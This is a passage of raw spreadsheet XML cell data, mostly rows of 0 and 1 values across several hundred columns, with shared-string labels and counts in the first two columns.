      <c r="PM16">
        <v>0</v>
      </c>
      <c r="PN16">
        <v>0</v>
      </c>
      <c r="PO16">
        <v>0</v>
      </c>
      <c r="PP16">
        <v>0</v>
      </c>
      <c r="PQ16">
        <v>0</v>
      </c>
      <c r="PR16">
        <v>0</v>
      </c>
      <c r="PS16">
        <v>0</v>
      </c>
      <c r="PT16">
        <v>0</v>
      </c>
      <c r="PU16">
        <v>0</v>
      </c>
      <c r="PV16">
        <v>0</v>
      </c>
      <c r="PW16">
        <v>0</v>
      </c>
      <c r="PX16">
        <v>0</v>
      </c>
      <c r="PY16">
        <v>0</v>
      </c>
      <c r="PZ16">
        <v>0</v>
      </c>
      <c r="QA16">
        <v>0</v>
      </c>
      <c r="QB16">
        <v>0</v>
      </c>
      <c r="QC16">
        <v>0</v>
      </c>
      <c r="QD16">
        <v>0</v>
      </c>
      <c r="QE16">
        <v>0</v>
      </c>
      <c r="QF16">
        <v>0</v>
      </c>
      <c r="QG16">
        <v>0</v>
      </c>
      <c r="QH16">
        <v>0</v>
      </c>
      <c r="QI16">
        <v>0</v>
      </c>
      <c r="QJ16">
        <v>0</v>
      </c>
      <c r="QK16">
        <v>0</v>
      </c>
      <c r="QL16">
        <v>0</v>
      </c>
      <c r="QM16">
        <v>0</v>
      </c>
      <c r="QN16">
        <v>0</v>
      </c>
      <c r="QO16">
        <v>0</v>
      </c>
      <c r="QP16">
        <v>0</v>
      </c>
      <c r="QQ16">
        <v>0</v>
      </c>
      <c r="QR16">
        <v>0</v>
      </c>
      <c r="QS16">
        <v>0</v>
      </c>
      <c r="QT16">
        <v>0</v>
      </c>
      <c r="QU16">
        <v>0</v>
      </c>
      <c r="QV16">
        <v>0</v>
      </c>
      <c r="QW16">
        <v>0</v>
      </c>
      <c r="QX16">
        <v>0</v>
      </c>
      <c r="QY16">
        <v>0</v>
      </c>
      <c r="QZ16">
        <v>0</v>
      </c>
      <c r="RA16">
        <v>0</v>
      </c>
      <c r="RB16">
        <v>0</v>
      </c>
      <c r="RC16">
        <v>0</v>
      </c>
      <c r="RD16">
        <v>0</v>
      </c>
      <c r="RE16">
        <v>0</v>
      </c>
      <c r="RF16">
        <v>0</v>
      </c>
      <c r="RG16">
        <v>0</v>
      </c>
      <c r="RH16">
        <v>0</v>
      </c>
      <c r="RI16">
        <v>0</v>
      </c>
      <c r="RJ16">
        <v>0</v>
      </c>
      <c r="RK16">
        <v>0</v>
      </c>
      <c r="RL16">
        <v>0</v>
      </c>
      <c r="RM16">
        <v>0</v>
      </c>
      <c r="RN16">
        <v>0</v>
      </c>
      <c r="RO16">
        <v>0</v>
      </c>
      <c r="RP16">
        <v>0</v>
      </c>
      <c r="RQ16">
        <v>0</v>
      </c>
      <c r="RR16">
        <v>0</v>
      </c>
      <c r="RS16">
        <v>0</v>
      </c>
      <c r="RT16">
        <v>0</v>
      </c>
      <c r="RU16">
        <v>0</v>
      </c>
      <c r="RV16">
        <v>0</v>
      </c>
      <c r="RW16">
        <v>0</v>
      </c>
      <c r="RX16">
        <v>0</v>
      </c>
      <c r="RY16">
        <v>0</v>
      </c>
      <c r="RZ16">
        <v>0</v>
      </c>
      <c r="SA16">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A17" s="6" t="s">
        <v>2637</v>
      </c>
      <c r="B17">
        <v>24</v>
      </c>
      <c r="C17">
        <v>0</v>
      </c>
      <c r="D17">
        <v>0</v>
      </c>
      <c r="E17">
        <v>0</v>
      </c>
      <c r="F17">
        <v>0</v>
      </c>
      <c r="G17">
        <v>0</v>
      </c>
      <c r="H17">
        <v>0</v>
      </c>
      <c r="I17">
        <v>0</v>
      </c>
      <c r="J17">
        <v>0</v>
      </c>
      <c r="K17">
        <v>1</v>
      </c>
      <c r="L17">
        <v>0</v>
      </c>
      <c r="M17">
        <v>0</v>
      </c>
      <c r="N17">
        <v>0</v>
      </c>
      <c r="O17">
        <v>0</v>
      </c>
      <c r="P17">
        <v>0</v>
      </c>
      <c r="Q17">
        <v>0</v>
      </c>
      <c r="R17">
        <v>0</v>
      </c>
      <c r="S17">
        <v>0</v>
      </c>
      <c r="T17">
        <v>0</v>
      </c>
      <c r="U17">
        <v>0</v>
      </c>
      <c r="V17">
        <v>0</v>
      </c>
      <c r="W17">
        <v>0</v>
      </c>
      <c r="X17">
        <v>0</v>
      </c>
      <c r="Y17">
        <v>0</v>
      </c>
      <c r="Z17">
        <v>0</v>
      </c>
      <c r="AA17">
        <v>0</v>
      </c>
      <c r="AB17">
        <v>0</v>
      </c>
      <c r="AC17">
        <v>0</v>
      </c>
      <c r="AD17">
        <v>1</v>
      </c>
      <c r="AE17">
        <v>0</v>
      </c>
      <c r="AF17">
        <v>0</v>
      </c>
      <c r="AG17">
        <v>0</v>
      </c>
      <c r="AH17">
        <v>0</v>
      </c>
      <c r="AI17">
        <v>0</v>
      </c>
      <c r="AJ17">
        <v>0</v>
      </c>
      <c r="AK17">
        <v>0</v>
      </c>
      <c r="AL17">
        <v>0</v>
      </c>
      <c r="AM17">
        <v>0</v>
      </c>
      <c r="AN17">
        <v>0</v>
      </c>
      <c r="AO17">
        <v>0</v>
      </c>
      <c r="AP17">
        <v>0</v>
      </c>
      <c r="AQ17">
        <v>0</v>
      </c>
      <c r="AR17">
        <v>0</v>
      </c>
      <c r="AS17">
        <v>0</v>
      </c>
      <c r="AT17">
        <v>0</v>
      </c>
      <c r="AU17">
        <v>0</v>
      </c>
      <c r="AV17">
        <v>0</v>
      </c>
      <c r="AW17">
        <v>0</v>
      </c>
      <c r="AX17">
        <v>0</v>
      </c>
      <c r="AY17">
        <v>0</v>
      </c>
      <c r="AZ17">
        <v>0</v>
      </c>
      <c r="BA17">
        <v>0</v>
      </c>
      <c r="BB17">
        <v>0</v>
      </c>
      <c r="BC17">
        <v>0</v>
      </c>
      <c r="BD17">
        <v>0</v>
      </c>
      <c r="BE17">
        <v>0</v>
      </c>
      <c r="BF17">
        <v>0</v>
      </c>
      <c r="BG17">
        <v>0</v>
      </c>
      <c r="BH17">
        <v>0</v>
      </c>
      <c r="BI17">
        <v>0</v>
      </c>
      <c r="BJ17">
        <v>0</v>
      </c>
      <c r="BK17">
        <v>0</v>
      </c>
      <c r="BL17">
        <v>0</v>
      </c>
      <c r="BM17">
        <v>0</v>
      </c>
      <c r="BN17">
        <v>0</v>
      </c>
      <c r="BO17">
        <v>0</v>
      </c>
      <c r="BP17">
        <v>0</v>
      </c>
      <c r="BQ17">
        <v>0</v>
      </c>
      <c r="BR17">
        <v>0</v>
      </c>
      <c r="BS17">
        <v>0</v>
      </c>
      <c r="BT17">
        <v>0</v>
      </c>
      <c r="BU17">
        <v>0</v>
      </c>
      <c r="BV17">
        <v>0</v>
      </c>
      <c r="BW17">
        <v>0</v>
      </c>
      <c r="BX17">
        <v>1</v>
      </c>
      <c r="BY17">
        <v>1</v>
      </c>
      <c r="BZ17">
        <v>0</v>
      </c>
      <c r="CA17">
        <v>0</v>
      </c>
      <c r="CB17">
        <v>0</v>
      </c>
      <c r="CC17">
        <v>0</v>
      </c>
      <c r="CD17">
        <v>0</v>
      </c>
      <c r="CE17">
        <v>0</v>
      </c>
      <c r="CF17">
        <v>0</v>
      </c>
      <c r="CG17">
        <v>0</v>
      </c>
      <c r="CH17">
        <v>0</v>
      </c>
      <c r="CI17">
        <v>0</v>
      </c>
      <c r="CJ17">
        <v>0</v>
      </c>
      <c r="CK17">
        <v>0</v>
      </c>
      <c r="CL17">
        <v>0</v>
      </c>
      <c r="CM17">
        <v>0</v>
      </c>
      <c r="CN17">
        <v>0</v>
      </c>
      <c r="CO17">
        <v>0</v>
      </c>
      <c r="CP17">
        <v>0</v>
      </c>
      <c r="CQ17">
        <v>0</v>
      </c>
      <c r="CR17">
        <v>0</v>
      </c>
      <c r="CS17">
        <v>1</v>
      </c>
      <c r="CT17">
        <v>0</v>
      </c>
      <c r="CU17">
        <v>0</v>
      </c>
      <c r="CV17">
        <v>0</v>
      </c>
      <c r="CW17">
        <v>0</v>
      </c>
      <c r="CX17">
        <v>0</v>
      </c>
      <c r="CY17">
        <v>0</v>
      </c>
      <c r="CZ17">
        <v>0</v>
      </c>
      <c r="DA17">
        <v>0</v>
      </c>
      <c r="DB17">
        <v>0</v>
      </c>
      <c r="DC17">
        <v>0</v>
      </c>
      <c r="DD17">
        <v>0</v>
      </c>
      <c r="DE17">
        <v>0</v>
      </c>
      <c r="DF17">
        <v>0</v>
      </c>
      <c r="DG17">
        <v>0</v>
      </c>
      <c r="DH17">
        <v>0</v>
      </c>
      <c r="DI17">
        <v>0</v>
      </c>
      <c r="DJ17">
        <v>1</v>
      </c>
      <c r="DK17">
        <v>0</v>
      </c>
      <c r="DL17">
        <v>0</v>
      </c>
      <c r="DM17">
        <v>0</v>
      </c>
      <c r="DN17">
        <v>0</v>
      </c>
      <c r="DO17">
        <v>0</v>
      </c>
      <c r="DP17">
        <v>0</v>
      </c>
      <c r="DQ17">
        <v>0</v>
      </c>
      <c r="DR17">
        <v>0</v>
      </c>
      <c r="DS17">
        <v>0</v>
      </c>
      <c r="DT17">
        <v>0</v>
      </c>
      <c r="DU17">
        <v>0</v>
      </c>
      <c r="DV17">
        <v>0</v>
      </c>
      <c r="DW17">
        <v>0</v>
      </c>
      <c r="DX17">
        <v>0</v>
      </c>
      <c r="DY17">
        <v>0</v>
      </c>
      <c r="DZ17">
        <v>0</v>
      </c>
      <c r="EA17">
        <v>0</v>
      </c>
      <c r="EB17">
        <v>0</v>
      </c>
      <c r="EC17">
        <v>0</v>
      </c>
      <c r="ED17">
        <v>0</v>
      </c>
      <c r="EE17">
        <v>0</v>
      </c>
      <c r="EF17">
        <v>0</v>
      </c>
      <c r="EG17">
        <v>0</v>
      </c>
      <c r="EH17">
        <v>0</v>
      </c>
      <c r="EI17">
        <v>0</v>
      </c>
      <c r="EJ17">
        <v>0</v>
      </c>
      <c r="EK17">
        <v>0</v>
      </c>
      <c r="EL17">
        <v>0</v>
      </c>
      <c r="EM17">
        <v>0</v>
      </c>
      <c r="EN17">
        <v>0</v>
      </c>
      <c r="EO17">
        <v>0</v>
      </c>
      <c r="EP17">
        <v>0</v>
      </c>
      <c r="EQ17">
        <v>0</v>
      </c>
      <c r="ER17">
        <v>0</v>
      </c>
      <c r="ES17">
        <v>0</v>
      </c>
      <c r="ET17">
        <v>0</v>
      </c>
      <c r="EU17">
        <v>0</v>
      </c>
      <c r="EV17">
        <v>0</v>
      </c>
      <c r="EW17">
        <v>0</v>
      </c>
      <c r="EX17">
        <v>1</v>
      </c>
      <c r="EY17">
        <v>0</v>
      </c>
      <c r="EZ17">
        <v>0</v>
      </c>
      <c r="FA17">
        <v>0</v>
      </c>
      <c r="FB17">
        <v>0</v>
      </c>
      <c r="FC17">
        <v>0</v>
      </c>
      <c r="FD17">
        <v>0</v>
      </c>
      <c r="FE17">
        <v>0</v>
      </c>
      <c r="FF17">
        <v>0</v>
      </c>
      <c r="FG17">
        <v>0</v>
      </c>
      <c r="FH17">
        <v>0</v>
      </c>
      <c r="FI17">
        <v>0</v>
      </c>
      <c r="FJ17">
        <v>0</v>
      </c>
      <c r="FK17">
        <v>0</v>
      </c>
      <c r="FL17">
        <v>0</v>
      </c>
      <c r="FM17">
        <v>0</v>
      </c>
      <c r="FN17">
        <v>1</v>
      </c>
      <c r="FO17">
        <v>0</v>
      </c>
      <c r="FP17">
        <v>0</v>
      </c>
      <c r="FQ17">
        <v>0</v>
      </c>
      <c r="FR17">
        <v>1</v>
      </c>
      <c r="FS17">
        <v>0</v>
      </c>
      <c r="FT17">
        <v>0</v>
      </c>
      <c r="FU17">
        <v>0</v>
      </c>
      <c r="FV17">
        <v>0</v>
      </c>
      <c r="FW17">
        <v>0</v>
      </c>
      <c r="FX17">
        <v>0</v>
      </c>
      <c r="FY17">
        <v>0</v>
      </c>
      <c r="FZ17">
        <v>0</v>
      </c>
      <c r="GA17">
        <v>0</v>
      </c>
      <c r="GB17">
        <v>0</v>
      </c>
      <c r="GC17">
        <v>0</v>
      </c>
      <c r="GD17">
        <v>0</v>
      </c>
      <c r="GE17">
        <v>0</v>
      </c>
      <c r="GF17">
        <v>1</v>
      </c>
      <c r="GG17">
        <v>0</v>
      </c>
      <c r="GH17">
        <v>0</v>
      </c>
      <c r="GI17">
        <v>0</v>
      </c>
      <c r="GJ17">
        <v>0</v>
      </c>
      <c r="GK17">
        <v>0</v>
      </c>
      <c r="GL17">
        <v>0</v>
      </c>
      <c r="GM17">
        <v>0</v>
      </c>
      <c r="GN17">
        <v>0</v>
      </c>
      <c r="GO17">
        <v>0</v>
      </c>
      <c r="GP17">
        <v>0</v>
      </c>
      <c r="GQ17">
        <v>0</v>
      </c>
      <c r="GR17">
        <v>0</v>
      </c>
      <c r="GS17">
        <v>0</v>
      </c>
      <c r="GT17">
        <v>0</v>
      </c>
      <c r="GU17">
        <v>0</v>
      </c>
      <c r="GV17">
        <v>0</v>
      </c>
      <c r="GW17">
        <v>0</v>
      </c>
      <c r="GX17">
        <v>0</v>
      </c>
      <c r="GY17">
        <v>0</v>
      </c>
      <c r="GZ17">
        <v>0</v>
      </c>
      <c r="HA17">
        <v>0</v>
      </c>
      <c r="HB17">
        <v>0</v>
      </c>
      <c r="HC17">
        <v>0</v>
      </c>
      <c r="HD17">
        <v>0</v>
      </c>
      <c r="HE17">
        <v>0</v>
      </c>
      <c r="HF17">
        <v>0</v>
      </c>
      <c r="HG17">
        <v>0</v>
      </c>
      <c r="HH17">
        <v>0</v>
      </c>
      <c r="HI17">
        <v>0</v>
      </c>
      <c r="HJ17">
        <v>0</v>
      </c>
      <c r="HK17">
        <v>0</v>
      </c>
      <c r="HL17">
        <v>0</v>
      </c>
      <c r="HM17">
        <v>0</v>
      </c>
      <c r="HN17">
        <v>0</v>
      </c>
      <c r="HO17">
        <v>0</v>
      </c>
      <c r="HP17">
        <v>0</v>
      </c>
      <c r="HQ17">
        <v>0</v>
      </c>
      <c r="HR17">
        <v>0</v>
      </c>
      <c r="HS17">
        <v>0</v>
      </c>
      <c r="HT17">
        <v>0</v>
      </c>
      <c r="HU17">
        <v>0</v>
      </c>
      <c r="HV17">
        <v>0</v>
      </c>
      <c r="HW17">
        <v>0</v>
      </c>
      <c r="HX17">
        <v>1</v>
      </c>
      <c r="HY17">
        <v>0</v>
      </c>
      <c r="HZ17">
        <v>0</v>
      </c>
      <c r="IA17">
        <v>0</v>
      </c>
      <c r="IB17">
        <v>0</v>
      </c>
      <c r="IC17">
        <v>0</v>
      </c>
      <c r="ID17">
        <v>0</v>
      </c>
      <c r="IE17">
        <v>0</v>
      </c>
      <c r="IF17">
        <v>0</v>
      </c>
      <c r="IG17">
        <v>0</v>
      </c>
      <c r="IH17">
        <v>0</v>
      </c>
      <c r="II17">
        <v>0</v>
      </c>
      <c r="IJ17">
        <v>0</v>
      </c>
      <c r="IK17">
        <v>0</v>
      </c>
      <c r="IL17">
        <v>0</v>
      </c>
      <c r="IM17">
        <v>0</v>
      </c>
      <c r="IN17">
        <v>0</v>
      </c>
      <c r="IO17">
        <v>0</v>
      </c>
      <c r="IP17">
        <v>0</v>
      </c>
      <c r="IQ17">
        <v>0</v>
      </c>
      <c r="IR17">
        <v>0</v>
      </c>
      <c r="IS17">
        <v>0</v>
      </c>
      <c r="IT17">
        <v>0</v>
      </c>
      <c r="IU17">
        <v>0</v>
      </c>
      <c r="IV17">
        <v>0</v>
      </c>
      <c r="IW17">
        <v>0</v>
      </c>
      <c r="IX17">
        <v>1</v>
      </c>
      <c r="IY17">
        <v>0</v>
      </c>
      <c r="IZ17">
        <v>0</v>
      </c>
      <c r="JA17">
        <v>0</v>
      </c>
      <c r="JB17">
        <v>0</v>
      </c>
      <c r="JC17">
        <v>0</v>
      </c>
      <c r="JD17">
        <v>0</v>
      </c>
      <c r="JE17">
        <v>0</v>
      </c>
      <c r="JF17">
        <v>0</v>
      </c>
      <c r="JG17">
        <v>0</v>
      </c>
      <c r="JH17">
        <v>0</v>
      </c>
      <c r="JI17">
        <v>0</v>
      </c>
      <c r="JJ17">
        <v>0</v>
      </c>
      <c r="JK17">
        <v>0</v>
      </c>
      <c r="JL17">
        <v>0</v>
      </c>
      <c r="JM17">
        <v>0</v>
      </c>
      <c r="JN17">
        <v>0</v>
      </c>
      <c r="JO17">
        <v>0</v>
      </c>
      <c r="JP17">
        <v>0</v>
      </c>
      <c r="JQ17">
        <v>0</v>
      </c>
      <c r="JR17">
        <v>0</v>
      </c>
      <c r="JS17">
        <v>0</v>
      </c>
      <c r="JT17">
        <v>0</v>
      </c>
      <c r="JU17">
        <v>0</v>
      </c>
      <c r="JV17">
        <v>0</v>
      </c>
      <c r="JW17">
        <v>0</v>
      </c>
      <c r="JX17">
        <v>0</v>
      </c>
      <c r="JY17">
        <v>0</v>
      </c>
      <c r="JZ17">
        <v>0</v>
      </c>
      <c r="KA17">
        <v>0</v>
      </c>
      <c r="KB17">
        <v>0</v>
      </c>
      <c r="KC17">
        <v>0</v>
      </c>
      <c r="KD17">
        <v>1</v>
      </c>
      <c r="KE17">
        <v>0</v>
      </c>
      <c r="KF17">
        <v>0</v>
      </c>
      <c r="KG17">
        <v>1</v>
      </c>
      <c r="KH17">
        <v>0</v>
      </c>
      <c r="KI17">
        <v>0</v>
      </c>
      <c r="KJ17">
        <v>0</v>
      </c>
      <c r="KK17">
        <v>0</v>
      </c>
      <c r="KL17">
        <v>0</v>
      </c>
      <c r="KM17">
        <v>0</v>
      </c>
      <c r="KN17">
        <v>0</v>
      </c>
      <c r="KO17">
        <v>0</v>
      </c>
      <c r="KP17">
        <v>0</v>
      </c>
      <c r="KQ17">
        <v>0</v>
      </c>
      <c r="KR17">
        <v>1</v>
      </c>
      <c r="KS17">
        <v>1</v>
      </c>
      <c r="KT17">
        <v>0</v>
      </c>
      <c r="KU17">
        <v>0</v>
      </c>
      <c r="KV17">
        <v>0</v>
      </c>
      <c r="KW17">
        <v>0</v>
      </c>
      <c r="KX17">
        <v>0</v>
      </c>
      <c r="KY17">
        <v>0</v>
      </c>
      <c r="KZ17">
        <v>0</v>
      </c>
      <c r="LA17">
        <v>0</v>
      </c>
      <c r="LB17">
        <v>0</v>
      </c>
      <c r="LC17">
        <v>0</v>
      </c>
      <c r="LD17">
        <v>0</v>
      </c>
      <c r="LE17">
        <v>0</v>
      </c>
      <c r="LF17">
        <v>0</v>
      </c>
      <c r="LG17">
        <v>0</v>
      </c>
      <c r="LH17">
        <v>0</v>
      </c>
      <c r="LI17">
        <v>0</v>
      </c>
      <c r="LJ17">
        <v>0</v>
      </c>
      <c r="LK17">
        <v>0</v>
      </c>
      <c r="LL17">
        <v>1</v>
      </c>
      <c r="LM17">
        <v>0</v>
      </c>
      <c r="LN17">
        <v>0</v>
      </c>
      <c r="LO17">
        <v>0</v>
      </c>
      <c r="LP17">
        <v>1</v>
      </c>
      <c r="LQ17">
        <v>0</v>
      </c>
      <c r="LR17">
        <v>0</v>
      </c>
      <c r="LS17">
        <v>0</v>
      </c>
      <c r="LT17">
        <v>0</v>
      </c>
      <c r="LU17">
        <v>0</v>
      </c>
      <c r="LV17">
        <v>0</v>
      </c>
      <c r="LW17">
        <v>0</v>
      </c>
      <c r="LX17">
        <v>0</v>
      </c>
      <c r="LY17">
        <v>0</v>
      </c>
      <c r="LZ17">
        <v>0</v>
      </c>
      <c r="MA17">
        <v>0</v>
      </c>
      <c r="MB17">
        <v>0</v>
      </c>
      <c r="MC17">
        <v>0</v>
      </c>
      <c r="MD17">
        <v>0</v>
      </c>
      <c r="ME17">
        <v>0</v>
      </c>
      <c r="MF17">
        <v>0</v>
      </c>
      <c r="MG17">
        <v>0</v>
      </c>
      <c r="MH17">
        <v>0</v>
      </c>
      <c r="MI17">
        <v>0</v>
      </c>
      <c r="MJ17">
        <v>0</v>
      </c>
      <c r="MK17">
        <v>0</v>
      </c>
      <c r="ML17">
        <v>1</v>
      </c>
      <c r="MM17">
        <v>0</v>
      </c>
      <c r="MN17">
        <v>0</v>
      </c>
      <c r="MO17">
        <v>0</v>
      </c>
      <c r="MP17">
        <v>0</v>
      </c>
      <c r="MQ17">
        <v>0</v>
      </c>
      <c r="MR17">
        <v>0</v>
      </c>
      <c r="MS17">
        <v>0</v>
      </c>
      <c r="MT17">
        <v>0</v>
      </c>
      <c r="MU17">
        <v>0</v>
      </c>
      <c r="MV17">
        <v>0</v>
      </c>
      <c r="MW17">
        <v>0</v>
      </c>
      <c r="MX17">
        <v>0</v>
      </c>
      <c r="MY17">
        <v>0</v>
      </c>
      <c r="MZ17">
        <v>0</v>
      </c>
      <c r="NA17">
        <v>0</v>
      </c>
      <c r="NB17">
        <v>0</v>
      </c>
      <c r="NC17">
        <v>0</v>
      </c>
      <c r="ND17">
        <v>0</v>
      </c>
      <c r="NE17">
        <v>0</v>
      </c>
      <c r="NF17">
        <v>0</v>
      </c>
      <c r="NG17">
        <v>0</v>
      </c>
      <c r="NH17">
        <v>1</v>
      </c>
      <c r="NI17">
        <v>0</v>
      </c>
      <c r="NJ17">
        <v>0</v>
      </c>
      <c r="NK17">
        <v>1</v>
      </c>
      <c r="NL17">
        <v>0</v>
      </c>
      <c r="NM17">
        <v>0</v>
      </c>
      <c r="NN17">
        <v>0</v>
      </c>
      <c r="NO17">
        <v>0</v>
      </c>
      <c r="NP17">
        <v>0</v>
      </c>
      <c r="NQ17">
        <v>0</v>
      </c>
      <c r="NR17">
        <v>0</v>
      </c>
      <c r="NS17">
        <v>0</v>
      </c>
      <c r="NT17">
        <v>0</v>
      </c>
      <c r="NU17">
        <v>1</v>
      </c>
      <c r="NV17">
        <v>0</v>
      </c>
      <c r="NW17">
        <v>0</v>
      </c>
      <c r="NX17">
        <v>0</v>
      </c>
      <c r="NY17">
        <v>0</v>
      </c>
      <c r="NZ17">
        <v>0</v>
      </c>
      <c r="OA17">
        <v>0</v>
      </c>
      <c r="OB17">
        <v>0</v>
      </c>
      <c r="OC17">
        <v>0</v>
      </c>
      <c r="OD17">
        <v>0</v>
      </c>
      <c r="OE17">
        <v>0</v>
      </c>
      <c r="OF17">
        <v>0</v>
      </c>
      <c r="OG17">
        <v>0</v>
      </c>
      <c r="OH17">
        <v>0</v>
      </c>
      <c r="OI17">
        <v>0</v>
      </c>
      <c r="OJ17">
        <v>0</v>
      </c>
      <c r="OK17">
        <v>0</v>
      </c>
      <c r="OL17">
        <v>0</v>
      </c>
      <c r="OM17">
        <v>0</v>
      </c>
      <c r="ON17">
        <v>0</v>
      </c>
      <c r="OO17">
        <v>0</v>
      </c>
      <c r="OP17">
        <v>0</v>
      </c>
      <c r="OQ17">
        <v>0</v>
      </c>
      <c r="OR17">
        <v>0</v>
      </c>
      <c r="OS17">
        <v>0</v>
      </c>
      <c r="OT17">
        <v>0</v>
      </c>
      <c r="OU17">
        <v>1</v>
      </c>
      <c r="OV17">
        <v>0</v>
      </c>
      <c r="OW17">
        <v>0</v>
      </c>
      <c r="OX17">
        <v>0</v>
      </c>
      <c r="OY17">
        <v>0</v>
      </c>
      <c r="OZ17">
        <v>0</v>
      </c>
      <c r="PA17">
        <v>0</v>
      </c>
      <c r="PB17">
        <v>0</v>
      </c>
      <c r="PC17">
        <v>0</v>
      </c>
      <c r="PD17">
        <v>0</v>
      </c>
      <c r="PE17">
        <v>0</v>
      </c>
      <c r="PF17">
        <v>0</v>
      </c>
      <c r="PG17">
        <v>0</v>
      </c>
      <c r="PH17">
        <v>0</v>
      </c>
      <c r="PI17">
        <v>0</v>
      </c>
      <c r="PJ17">
        <v>0</v>
      </c>
      <c r="PK17">
        <v>0</v>
      </c>
      <c r="PL17">
        <v>0</v>
      </c>
      <c r="PM17">
        <v>0</v>
      </c>
      <c r="PN17">
        <v>0</v>
      </c>
      <c r="PO17">
        <v>0</v>
      </c>
      <c r="PP17">
        <v>0</v>
      </c>
      <c r="PQ17">
        <v>0</v>
      </c>
      <c r="PR17">
        <v>0</v>
      </c>
      <c r="PS17">
        <v>0</v>
      </c>
      <c r="PT17">
        <v>0</v>
      </c>
      <c r="PU17">
        <v>0</v>
      </c>
      <c r="PV17">
        <v>0</v>
      </c>
      <c r="PW17">
        <v>0</v>
      </c>
      <c r="PX17">
        <v>0</v>
      </c>
      <c r="PY17">
        <v>0</v>
      </c>
      <c r="PZ17">
        <v>0</v>
      </c>
      <c r="QA17">
        <v>0</v>
      </c>
      <c r="QB17">
        <v>0</v>
      </c>
      <c r="QC17">
        <v>0</v>
      </c>
      <c r="QD17">
        <v>1</v>
      </c>
      <c r="QE17">
        <v>0</v>
      </c>
      <c r="QF17">
        <v>0</v>
      </c>
      <c r="QG17">
        <v>0</v>
      </c>
      <c r="QH17">
        <v>0</v>
      </c>
      <c r="QI17">
        <v>0</v>
      </c>
      <c r="QJ17">
        <v>0</v>
      </c>
      <c r="QK17">
        <v>0</v>
      </c>
      <c r="QL17">
        <v>0</v>
      </c>
      <c r="QM17">
        <v>0</v>
      </c>
      <c r="QN17">
        <v>0</v>
      </c>
      <c r="QO17">
        <v>0</v>
      </c>
      <c r="QP17">
        <v>0</v>
      </c>
      <c r="QQ17">
        <v>0</v>
      </c>
      <c r="QR17">
        <v>0</v>
      </c>
      <c r="QS17">
        <v>0</v>
      </c>
      <c r="QT17">
        <v>0</v>
      </c>
      <c r="QU17">
        <v>0</v>
      </c>
      <c r="QV17">
        <v>0</v>
      </c>
      <c r="QW17">
        <v>0</v>
      </c>
      <c r="QX17">
        <v>0</v>
      </c>
      <c r="QY17">
        <v>0</v>
      </c>
      <c r="QZ17">
        <v>0</v>
      </c>
      <c r="RA17">
        <v>0</v>
      </c>
      <c r="RB17">
        <v>0</v>
      </c>
      <c r="RC17">
        <v>0</v>
      </c>
      <c r="RD17">
        <v>0</v>
      </c>
      <c r="RE17">
        <v>0</v>
      </c>
      <c r="RF17">
        <v>0</v>
      </c>
      <c r="RG17">
        <v>0</v>
      </c>
      <c r="RH17">
        <v>0</v>
      </c>
      <c r="RI17">
        <v>0</v>
      </c>
      <c r="RJ17">
        <v>0</v>
      </c>
      <c r="RK17">
        <v>0</v>
      </c>
      <c r="RL17">
        <v>0</v>
      </c>
      <c r="RM17">
        <v>0</v>
      </c>
      <c r="RN17">
        <v>0</v>
      </c>
      <c r="RO17">
        <v>0</v>
      </c>
      <c r="RP17">
        <v>0</v>
      </c>
      <c r="RQ17">
        <v>0</v>
      </c>
      <c r="RR17">
        <v>0</v>
      </c>
      <c r="RS17">
        <v>0</v>
      </c>
      <c r="RT17">
        <v>0</v>
      </c>
      <c r="RU17">
        <v>0</v>
      </c>
      <c r="RV17">
        <v>0</v>
      </c>
      <c r="RW17">
        <v>0</v>
      </c>
      <c r="RX17">
        <v>0</v>
      </c>
      <c r="RY17">
        <v>0</v>
      </c>
      <c r="RZ17">
        <v>0</v>
      </c>
      <c r="SA17">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A18" s="6" t="s">
        <v>2644</v>
      </c>
      <c r="B18">
        <v>11</v>
      </c>
      <c r="C18">
        <v>0</v>
      </c>
      <c r="D18">
        <v>0</v>
      </c>
      <c r="E18">
        <v>0</v>
      </c>
      <c r="F18">
        <v>0</v>
      </c>
      <c r="G18">
        <v>0</v>
      </c>
      <c r="H18">
        <v>0</v>
      </c>
      <c r="I18">
        <v>0</v>
      </c>
      <c r="J18">
        <v>0</v>
      </c>
      <c r="K18">
        <v>0</v>
      </c>
      <c r="L18">
        <v>0</v>
      </c>
      <c r="M18">
        <v>0</v>
      </c>
      <c r="N18">
        <v>0</v>
      </c>
      <c r="O18">
        <v>0</v>
      </c>
      <c r="P18">
        <v>1</v>
      </c>
      <c r="Q18">
        <v>0</v>
      </c>
      <c r="R18">
        <v>0</v>
      </c>
      <c r="S18">
        <v>0</v>
      </c>
      <c r="T18">
        <v>0</v>
      </c>
      <c r="U18">
        <v>0</v>
      </c>
      <c r="V18">
        <v>0</v>
      </c>
      <c r="W18">
        <v>0</v>
      </c>
      <c r="X18">
        <v>0</v>
      </c>
      <c r="Y18">
        <v>0</v>
      </c>
      <c r="Z18">
        <v>0</v>
      </c>
      <c r="AA18">
        <v>0</v>
      </c>
      <c r="AB18">
        <v>0</v>
      </c>
      <c r="AC18">
        <v>0</v>
      </c>
      <c r="AD18">
        <v>0</v>
      </c>
      <c r="AE18">
        <v>0</v>
      </c>
      <c r="AF18">
        <v>0</v>
      </c>
      <c r="AG18">
        <v>0</v>
      </c>
      <c r="AH18">
        <v>0</v>
      </c>
      <c r="AI18">
        <v>0</v>
      </c>
      <c r="AJ18">
        <v>0</v>
      </c>
      <c r="AK18">
        <v>0</v>
      </c>
      <c r="AL18">
        <v>0</v>
      </c>
      <c r="AM18">
        <v>0</v>
      </c>
      <c r="AN18">
        <v>0</v>
      </c>
      <c r="AO18">
        <v>0</v>
      </c>
      <c r="AP18">
        <v>0</v>
      </c>
      <c r="AQ18">
        <v>0</v>
      </c>
      <c r="AR18">
        <v>0</v>
      </c>
      <c r="AS18">
        <v>0</v>
      </c>
      <c r="AT18">
        <v>0</v>
      </c>
      <c r="AU18">
        <v>0</v>
      </c>
      <c r="AV18">
        <v>0</v>
      </c>
      <c r="AW18">
        <v>0</v>
      </c>
      <c r="AX18">
        <v>0</v>
      </c>
      <c r="AY18">
        <v>0</v>
      </c>
      <c r="AZ18">
        <v>0</v>
      </c>
      <c r="BA18">
        <v>1</v>
      </c>
      <c r="BB18">
        <v>0</v>
      </c>
      <c r="BC18">
        <v>0</v>
      </c>
      <c r="BD18">
        <v>0</v>
      </c>
      <c r="BE18">
        <v>0</v>
      </c>
      <c r="BF18">
        <v>0</v>
      </c>
      <c r="BG18">
